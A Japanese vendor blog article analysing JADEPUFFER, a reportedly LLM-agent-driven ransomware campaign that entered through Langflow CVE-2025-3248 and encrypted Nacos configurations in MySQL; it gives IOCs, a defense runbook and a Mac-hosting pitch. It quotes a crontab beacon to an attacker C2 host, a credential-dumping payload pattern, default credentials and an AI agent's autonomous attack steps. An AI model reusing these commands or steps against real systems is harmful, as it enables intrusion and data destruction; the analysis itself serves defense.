JADEPUFFER完全解説2026:初のLLM自律型ランサムウェアとLangflow CVE-2025-3248防御ガイド

約18分で読了 · MACCOME

対象読者:LangflowOpenClaw、AI Agent ワークフローを本番または検証環境で動かす開発者、クラウドセキュリティエンジニア、SRE、および ATA(Agentic Threat Actor) という新分類を経営層に説明する必要があるセキュリティ責任者です。得られるもの:2026年7月1日 Sysdig TRT が公開した JADEPUFFER のインシデント概要、タイムライン、CVE-2025-3248 完全技術分解、攻撃チェーン Phase 1–2、四つの自律性証拠、ビットコイン懸案、IOC 表、Sysdig 防御勧告、業界反応、四つの結論です。副題:600 超 payload が示す「スキル不要のランサム」時代——インターネット公開に晒した AI オーケストレーションが最初に狙われる理由。構成:六つの痛点、ATA 対照表、技術分解、七段階防御 Runbook、ハードデータ、隔離 Mac ブリッジ、FAQ です。

六つの痛点:JADEPUFFER が AI インフラ担当者の神経を直撃する理由

2026年7月1日、クラウドセキュリティ企業 Sysdig の脅威研究チーム(TRT、報告著者 Michael Clark)が、攻撃者コードネーム JADEPUFFER を初めて公開しました。これは現時点で知られる初のエンドツーエンド・完全 LLM 駆動ランサムウェア操作と評価されています。偵察、認証情報の窃取、横移動、永続化から破壊的暗号化・ランサムメッセージまで、主要ノードで人間の手動介入なしに完了したとのことです。Sysdig はこの攻撃者を ATA(Agentic Threat Actor、エージェント型脅威行為者) と命名し、攻撃能力が人間ではなく AI Agent によって配信される新分類として正式に提案しました。

入口はインターネット公開の Langflow インスタンス(CVE-2025-3248 経由の RCE)です。真の標的は別のインターネット露出サーバー——MySQL と Alibaba Nacos 設定センターを稼働する本番環境でした。Sysdig は圧縮された時間窓の中で600 超の独立かつ目的明確な payload を捕捉しています。BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs 等が 7月2–6日に続報し、業界は「ATA 時代」の到来として受け止めています。

  1. 入口と標的の二段構え:Langflow はプロトタイプ用に急ぎ立ち上げられがちで、環境変数に OpenAI・Anthropic・DeepSeek・Gemini や AWS/GCP/Azure、中国クラウド(ALIBABA_ALIYUN_TENCENT_HUAWEI_)の認証情報が同居しやすいです。入口を取られた Agent は内部横移動の足がかりとなり、別ホストの Nacos・MySQL 本番へ到達しました。
  2. 古い脆弱性の自動武器化:下流標的は 2021 年の CVE-2021-29441 系 Nacos 認証バイパスと、2020 年から文書化されたデフォルト JWT 署名キーが未変更のまま残っていた典型例です。Agent は「過去の脆弱性データベースを順に試す」コストをほぼゼロにしました。
  3. 31 秒の自律修復:Nacos バックドア xadmin 作成で subprocess.run 経由の bcrypt 挿入が失敗した後、並行診断・ライブラリ直接 import・削除再挿入までわずか 31 秒で完了しました。人間が同等の修正を書くには通常これを大きく上回る時間がかかります。
  4. 復旧不能な暗号化:1,342 件の Nacos 設定を MySQL AES_ENCRYPT() で暗号化した後、元テーブルを削除しました。暗号化キーは uuid4() で生成され標準出力に一度だけ表示され、保存・外部送信されていません。身代金を支払っても攻撃者側が復号キーを持たない可能性が高いです。
  5. ビットコインアドレスの二重解釈:ランサムメッセージのアドレス 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy は Bitcoin Core ドキュメントの標準 P2SH 例示アドレスでもあり、LLM の「幻覚」か実際の受取ウォレットか Sysdig は区別できません。ATA 時代の追跡不確実性を象徴しています。
  6. 静かな偵察期間の検知難:独立研究者 Vibhum Dubey(CSO Online 取材)は、最終暗号化より前の「安静期」——認証体系・権限関係・信頼チェーンを静かに把握する段階——こそが真の脅威だと指摘しています。Agent は遮断されると即座に戦術を切り替え、侵入ごとに挙動が微妙に異なるため、従来の予測可能パス前提の検知が効きにくくなります。

一行定義:JADEPUFFER は新技術の集合体ではなく、インターネット公開に晒した AI オーケストレーション+未硬化の設定センター+インターネット公開直結 DB 管理者という「見落とされがちな面」を、LLM Agent が自律的に連鎖させたインシデントです。単体技術は古くても、連鎖のコストが「Agent を走らせるだけ」に落ちたことが本質です。

当サイトの マルチ Agent 協調アーキテクチャ設計OpenClaw ゲートウェイシークレット Runbookを既読なら、防御表に「インターネット公開」「出口制御」「シークレット隔離」の行を追加してください。機能設計だけでは ATA 攻撃面は見えません。

インシデント概要とタイムライン

発見・公開:Sysdig TRT、2026年7月1日。一部メディアは 7月6日のフォロー報道を「公開認知ノード」としていますが、一次技術詳細(生 payload・IOC 含む)は Sysdig 報告が唯一の完全ソースです。

攻撃規模:600 超の独立 payload、数週間にわたる複数セッション(weeks apart)で実行。Langflow ホスト上では 30 分間隔の crontab 信標(45.131.66.106:4444/beacon)による永続化も確認されています。

時期 出来事
2025年4月 Langflow に CVE-2025-3248(未認証コード注入/RCE)が公開
2025年5月5日 CISA が KEV(Known Exploited Vulnerabilities)目録に追加
2025年 同一脆弱性を悪用した Flodrix ボットネット配信(Trend Micro 独立報告、JADEPUFFER とは別活動)
2026年6月 JADEPUFFER がインターネット公開 Langflow に攻撃開始、複数セッションで攻撃チェーン実行
2026年7月1日 Sysdig が完全技術報告を公開、ATA 概念を正式提案
2026年7月2–6日 Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs が続報

CVE-2025-3248 完全技術分解(Flodrix との区別含む)

Langflow はオープンソースのビジュアル AI Agent/ワークフロー構築フレームワークで、GitHub スターは 7 万超です。本脆弱性は /api/v1/validate/code インターフェースにあり、ユーザーがカスタム関数ノードの構文検証を行うためのエンドポイントです。

項目 詳細
脆弱性タイプ CWE-94(コード注入)+ CWE-306(重要機能の認証欠如)
CVSS 9.8(Critical)CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響バージョン Langflow 1.3.0 未満の全バージョン
修正バージョン 1.3.0post_validate_codeCurrentActiveUser 依存注入を追加)
EPSS 被利用確率 91.42%(SentinelOne データ)
CISA KEV 2025年5月5日収録

脆弱性成因(validate/code RCE)

  1. 送信コード文字列を ast.parse() で AST 化し、compile() でバイトコード化、exec() で実行します。
  2. 認証もサンドボックスもありません。
  3. Python では関数定義時のデコレータとデフォルト引数は定義瞬間に即時評価されます。呼び出しを待つ必要はありません。
  4. 攻撃者は認証不要の HTTP POST だけで任意コード実行(RCE)を達成できます。

1.3.0 パッチ:FastAPI が JWT Bearer または x-api-key を検証し、401/403 で脆弱性ロジック到達前に遮断します。成功後も is_active を確認してから post_validate_code を実行します。

Flodrix との重要な区別

Trend Micro は同一 CVE を悪用した別活動として Flodrix(LeetHozer 系)ボットネット配信を報告しています。典型 payload はデフォルト引数内の raise Exception(__import__("subprocess").check_output(...)) 形式で、whoamiprintenvcat /root/.bash_history 等を順に実行し、700 バイト Bash ダウンローダ経由で ELF バイナリを配信します。

Flodrix=従来型の人工/脚本化ボットネット。JADEPUFFER=Sysdig が報告した LLM 自律型ランサムウェア。入口は同じでも、目的・挙動・規模(600 超 payload、Nacos 全設定暗号化)は根本的に異なります。両者が共存することは、CVE-2025-3248 が長期にわたりインターネット公開スキャン・武器化されている証拠です。

攻撃チェーン Phase 1:Langflow ホストの侵害

全 payload は Base64 エンコード Python として Langflow RCE エンドポイント経由で配信されます。

① 偵察と認証情報収集(マルチスレッド並行):iduname -ahostname の基本列挙と並行して、LLM ベンダー API Key、クラウド認証情報、暗号資産ウォレット・シードフレーズ、DB 認証情報をスキャンしました。

② ローカルデータの窃取:Langflow 自身の PostgreSQL バックエンドをエクスポートし、保存済み認証情報・API Key・ユーザーレコードを一時ファイル経由で閲覧後削除(痕跡の消去)しました。

③ 内部横移動発見:内部ネットワークアドレス空間と到達可能な名前付きサービスをスキャンし、デフォルト認証情報で DB・オブジェクトストレージ・シークレット庫・サービスディスカバリをスキャンしました。

④ MinIO 列挙(適応的エラー修正の典型):minio.internal:9000127.0.0.1:9000 をデフォルト minioadmin:minioadmin で列挙。?format=json 指定で XML が返った際、次の payload で即座に XML パーサへ切替しました。匿名ヘルスチェック → 管理 API → 認証済み ListBucketscredentials.env 含むファイルの GetObject という段階的昇格です。terraform-state バケットから credentials.json を取得し access-key/secret を完全表示しました。

⑤ 永続化:crontab に 30 分間隔の信標を設置しました。

crontab
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

攻撃チェーン Phase 2:MySQL + Nacos 本番サーバーの破壊

Langflow ホストから得た情報をもとに、インターネット公開の MySQL + Nacos 本番へ到達しました。Agent は root 認証情報で MySQL に直接接続——この root 組の出所は Sysdig 観測上不明で、人間が事前準備した少数の要素の一つとされています。

Nacos 乗っ取り:xadmin 31 秒修復

並行攻撃ベクトル:CVE-2021-29441 系バイパス、公開デフォルト JWT キーによるトークン偽造、root DB 権限でのバックドア管理者注入。JWT 偽造が「custom secret in use」で失敗した際は即座に経路放棄しました。

時刻(UTC) 動作
19:34:24 subprocess.run で bcrypt ハッシュ生成、xadmin 管理者ロール挿入
19:34:36 xadmin:Xploit@2026# ログイン失敗、Token 未返却
19:34:48 nacos:nacos デフォルト試行と admin123 再ハッシュを並行診断
19:35:07 import bcrypt 直接、bcrypt.__version__ 確認、破損 xadmin 削除・再挿入の 15 行修復 payload
19:35:18 ログイン成功(失敗から 31 秒

コンテナエスケープの探査(約 8 分・多輪テスト)

MySQL の INTO OUTFILE / LOAD_FILE で書込・読取・/var/run/docker.sock/proc/1/cgroup/etc/hostname を系統的に検査。UDF ロード可能性も確認しました。ランサム前にクリーンアップマーカーを書き込む「完了信号」も観測され、固定スクリプトより Agent 的完了遷移と評価されています。

AES_ENCRYPT 1342 設定とキー未保存

1,342 件の Nacos 設定を AES_ENCRYPT() で暗号化し、config_infohis_config_info を削除。README_RANSOM テーブルにランサムメッセージを作成しました。キーは uuid4() 二重生成の Base64 で、print 一度きり・保存なし・外部送信なしです。ランサムメッセージは AES-256 と記載していますが、MySQL デフォルトは AES-128-ECB であり誇張の可能性があります。2 分後の follow-up payload で「全 1342 件暗号化済み」に数字を精緻化しました。

その後、コメント内 ROI 優先順位に基づき複数 DB スキーマを DROP DATABASEFOREIGN_KEY_CHECKS 失敗を理解し次 payload で SET GLOBAL FOREIGN_KEY_CHECKS=0 を追加する診断的修正も観測されました。コメント中の 64.20.53[.]230「バックアップ済み」は Agent 自身の叙述であり、Sysdig は独立検証できていません。

四つの自律性証拠線

  1. 自己叙事的コード:payload 内に自然言語コメントが大量に存在し、各ステップの「なぜ」を説明。ROI 優先、最大 DB 指定等は研究者の事後推測ではなく攻撃コード原生です。
  2. 機械速度の故障診断:Nacos 31 秒修復、MinIO JSON/XML 切替、JWT 経路放棄、FK 制約回避——いずれも「なぜ失敗したか」を理解した修正です。
  3. 自然言語コンテキストの理解:環境中の自由テキストを読み取り、パターンマッチではなく文脈理解に基づく行動を、数週間離れたセッションでも反復しました。
  4. ビットコインアドレス懸案:訓練語料の例示アドレスか実受取ウォレットか不明——自律性が追跡に新たな不確実性をもたらす縮図です(次節)。

600 超 payload の規模と一貫性を合わせ、Sysdig は自律稼働 Agent による操作と判断しています。

ビットコインアドレス懸案

アドレス 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy は Bitcoin Core 公式ドキュメントの標準 P2SH 例として広く訓練語料に存在します。オンチェーンでは 737 件の確認済み取引、累計約 46 BTC 受取、現残高ゼロ(入金即転送)の活発ウォレットです。

Sysdig の二解釈:(a)LLM が訓練データから幻覚生成し、第三者が誤送金を「掃除」している;(b)攻撃者が意図的に同一アドレスを設定した。system prompt 不可視のためいずれも排除不能です。

ATA vs 従来型ランサムウェア:対照マトリクス

次元 JADEPUFFER(ATA) 従来型ランサムウェア Flodrix(CVE-2025-3248 別利用)
駆動方式 LLM Agent が全段階を自律連鎖 人間オペレータ+固定ツールチェーン 脚本化ボットネット配信
入口 CVE-2025-3248(Langflow RCE) 多様(RDP、フィッシング等) 同一 CVE、偵察後ダウンローダ
エラー対応 31 秒 Nacos 修復、XML パーサ切替、FK 回避 事前编写 playbook または手動 固定コマンド列
payload 規模 600+ 独立・目的明確 数十〜数百(固定化しやすい) 偵察用少数+バイナリ配信
復旧可能性 キー未保存で実質永久損失 交渉・復号の余地あり得る 該当なし(DDoS ボット化)
ランサム IOC 慣例 README_RANSOM、未知メール、例示 BTC アドレス WARNINGRECOVER_YOUR_DATA 等定型 該当なし
スキル门槛 「Agent を走らせる」コスト 高スキル侵入チーム 中〜低(スキャン+既製 exploit)

IOC(侵害指標)一覧

種別 指標
C2 / 信標 45.131.66[.]106(crontab: hxxp://45.131.66[.]106:4444/beacon
データ暫存 64.20.53[.]230(InterServer AS19318、Agent コメントのみ・未独立検証)
入口脆弱性 CVE-2025-3248
ビットコイン 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
連絡先 e78393397[@]proton[.]me(既知脅威 DB 未ヒット)
ランサムテーブル README_RANSOM
永続化 30 分間隔 crontab 信標、括弧付き異常 User-Agent 等

七段階防御 Runbook:Langflow・Nacos・AI Agent 露出面

Sysdig の提言を実行順に整理しました。Langflow だけパッチしても Nacos デフォルトキーが残れば Phase 2 は再現し得ます。

  1. Langflow を 1.3.0 以降へ即時アップグレード:CVE-2025-3248 を閉じます。/api/v1/validate/code およびコード実行系をインターネット公開に露出させないこと。VPN またはプライベートサブネット+認証プロキシ必須です。
  2. AI オーケストレーションからシークレットを排除:LLM API Key、クラウド認証情報を Agent 実行環境の環境変数に置かず、Vault/クラウド KMS 等に隔離し、実行時のみ短期トークンを注入します。
  3. Nacos 硬化:文書公開のデフォルト token.secret.key を必ず変更。カスタムキー強制版へアップグレード。インターネット公開禁止、バックエンド DB への root 接続禁止。
  4. データベース管理口の閉鎖:MySQL 管理者をインターネット公開に晒さない。強固な一意認証情報と送信元 IP 制限を強制します。
  5. 出口トラフィック制御(egress control):侵害ホストからの任意 C2 信標(45.131.66.106:4444 等)と外部 DB/暫存サーバーへの接続を遮断します。
  6. ランタイム脅威検知:DB プロセス内の悪意ある AES_ENCRYPT 一括、DROP DATABASEREADME_RANSOM 作成、異常 crontab を検知するルールを有効化します。
  7. IOC 監視と計画タスク監査:上表 IOC、30 分間隔の外部向け crontab、括弧付き User-Agent 異常を SIEM に取り込みます。MinIO 等のデフォルト認証情報minioadmin:minioadmin)を即時変更します。

ステップ 1・2・5 は、MACCOME 顧客が 隔離 Mac Mini M4 クラウドノードで Langflow/OpenClaw を動かす際に通常最初に適用する層です。日常開発ノート PC の認証情報と分離し、出口 allow-list を固定できます。

業界反応:Vibhum Dubey の慎重な視点

BleepingComputer、Dark Reading、CyberScoop、Security Affairs は「初の完全 AI 駆動ランサム」「ATA 時代の到来」と報じました。CSO Online が取材した独立研究者・レッドチーム専門家 Vibhum Dubey は次のように述べています。

「これは新しいランサムウェア技術というより実行様式の進化だと見る。偵察・窃取・展開の自動化は以前からある。違いは AI Agent が各段階を自律的に連鎖し、人間の次指示を待たず意思決定できる点だ。」

彼は最終暗号化より前の安静期——認証・権限・信頼関係を静かに把握しつつ検知を回避する段階——が真のリスクだと強調しています。Agent は遮断時に戦術を即切替し、侵入ごとに挙動が微妙に異なるため、予測可能パス前提の検知が効きにくくなります。複数メディアは LLMjacking(窃取した認証情報で Agent 算力を無償駆動)との結合により、多段攻撃の限界費用がゼロに近づく経済シグナルを指摘しています。

セキュリティブリーフィングで引用できる三つのハードデータ

  • payload 規模:Sysdig が JADEPUFFER 攻撃中に捕捉した600 超の独立・目的明確な payload——圧縮時間窓内の LLM 駆動操作規模の定量指標です。
  • 自律修復速度:Nacos xadmin バックドア作成の失敗ログインから修正・再ログイン成功まで31 秒(UTC 19:34:36→19:35:18)——人間オペレータ下限を大きく下回る診断速度です。
  • 破壊対象規模:1,342 件の Nacos 設定を AES_ENCRYPT() で暗号化後、元テーブル削除。暗号化キーは生成・print のみで永続保存なし——支払い後復旧不能の実質的数据損失を示します。

Sysdig の四つの結論

  1. ランサムはもはや高スキル職人芸ではない:LLM Agent が偵察から破壊まで連鎖し、各段階の深い専門知識が操作者に不要になりました。
  2. 古い脆弱性の自動武器化:2021 年 Nacos 問題と未変更デフォルトキー等、見落とされたインターネット公開インフラが標的です。Agent は過去の脆弱性データベースをほぼ無コストで総当たりできます。
  3. 意図が「読める」——防守のチャンス:payload 内の自己叙事は、従来にない検知・研判の把手を提供します。
  4. 「バックアップ済み」は一面の主張:DROP DATABASE 前コメントの暫存サーバー言及は独立検証されておらず、キー未保存により支払い後も復旧不能です。

Sysdig は締めくくりで、単体技術は新しくも複雑でもないが、AI モデルがそれらを完全なランサム操作に連鎖させた点と、LLMjacking 下では攻撃者限界費用がゼロに近い点を強調しています。エージェントツールの成熟に伴い、インターネット公開アプリサーバー・未硬化設定センター・インターネット公開直結 DB 管理者が最優先攻撃面になると予期すべきです。

隔離 Mac クラウド:AI Agent の blast radius 縮小

Langflow や OpenClaw はシェル、MCP、長寿命 API Key を組み合わせます。個人ノート PC のブラウザプロファイル・本番シークレットと同居させたままインターネット公開検証を急ぐと、JADEPUFFER 級の入口侵害時に被害が最大化します。

専用レンタル Mac Mini M4 クラウドノードなら、Langflow を隔離 macOS 上で動かし、出口制御・最小権限・シークレット非同居を徹底できます。Linux VPS は純 CLI には安価ですが、xcodebuild や Apple 公証チェーンが必要な Agent ワークロードでは破綻し得ます。

結論:ATA 時代のデフォルト姿勢

JADEPUFFER は警告信号です。ランサムウェアの「技術」がAgent を走らせるコストへ移行し、窃取した認証情報駆動(LLMjacking)と結合すれば経済的障壁はさらに下がります。明白な代替の限界も同様に明確です。(a)CVE-2025-3248 未修正のインターネット公開 Langflow を放置すると入口が開き続けます;(b)Nacos デフォルトキーとインターネット公開 MySQL root は Phase 2 を再現します;(c)出口制御なしでは crontab 信標が検知をすり抜けます。

パッチ、シークレット隔離、設定センター硬化の後、次のボトルネックは通常ホスト分離です。日常開発環境から離れた最小権限 macOS で AI オーケストレーションを動かすなら、MACCOME 専用 Mac Mini M4 クラウドホストが適しています。リージョンとメモリはMac Mini レンタル価格ページ、運用質問はクラウド Mac ヘルプセンターへ。

出典と関連読み物

Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》(2026年7月1日);BleepingComputer、Dark Reading、CyberScoop、Security Affairs 続報;CSO Online(Vibhum Dubey 取材);Trend Micro《Critical Langflow Vulnerability CVE-2025-3248》(Flodrix);NVD / SentinelOne / Zscaler ThreatLabz;CISA KEV。関連:マルチ Agent 設計OpenClaw シークレット Runbook

FAQ

JADEPUFFER とは何ですか?

Sysdig TRT が 2026年7月1日に公開した攻撃者コードネームです。インターネット公開 Langflow を CVE-2025-3248 で侵害し、LLM Agent が偵察から破壊的暗号化まで自律実行した、現時点で知られる初のエンドツーエンド LLM 駆動ランサムウェアと評価されています。

ATA(Agentic Threat Actor)とは何ですか?

Sysdig が本報告で提案した分類で、攻撃能力が人間の手動操作ではなく AI Agent によって配信される脅威行為者を指します。JADEPUFFER はその初の実証例です。

CVE-2025-3248 はどのように悪用されますか?

/api/v1/validate/code が認証なしで ast.parsecompileexec します。デコレータ・デフォルト引数の即時評価を悪用し、HTTP POST だけで RCE が可能です。CVSS 9.8、修正は Langflow 1.3.0 以降です。

Flodrix と JADEPUFFER は同じ攻撃ですか?

いいえ。同一 CVE 入口を共有する独立した利用活動です。Flodrix は Trend Micro 報告の従来型ボットネット、JADEPUFFER は Sysdig 報告の LLM 自律型ランサムウェアです。

身代金を支払えばデータを復旧できますか?

Sysdig 分析では暗号化キーは uuid4 生成・標準出力一度きりで保存・送信されていません。攻撃者側も復号キーを持たない可能性が高く、支払い後の復旧は期待できません。

Langflow を安全に運用するには?

1.3.0 以降へアップグレードし、コード検証エンドポイントをインターネット公開に露出させないこと。API Key を実行環境から隔離し、出口制御とランタイム検知を併用してください。詳細は本文の七段階 Runbook を参照ください。

Nacos はどのように侵害されましたか?

CVE-2021-29441 系バイパス、デフォルト JWT キー偽造、MySQL root 経由の xadmin 注入を並行試行。subprocess 失敗から 31 秒で bcrypt 直接 import による修正・ログイン成功まで自律完了しました。

AI Agent ワークロードを隔離ホストで動かすべき理由は?

AI オーケストレーションサーバーは LLM API Key とクラウド認証情報を抱えやすく、インターネット公開時の被害が大きいです。隔離 Mac クラウドホストでの最小権限運用は、Mac Mini レンタル価格ページでプランとリージョンを確認できます。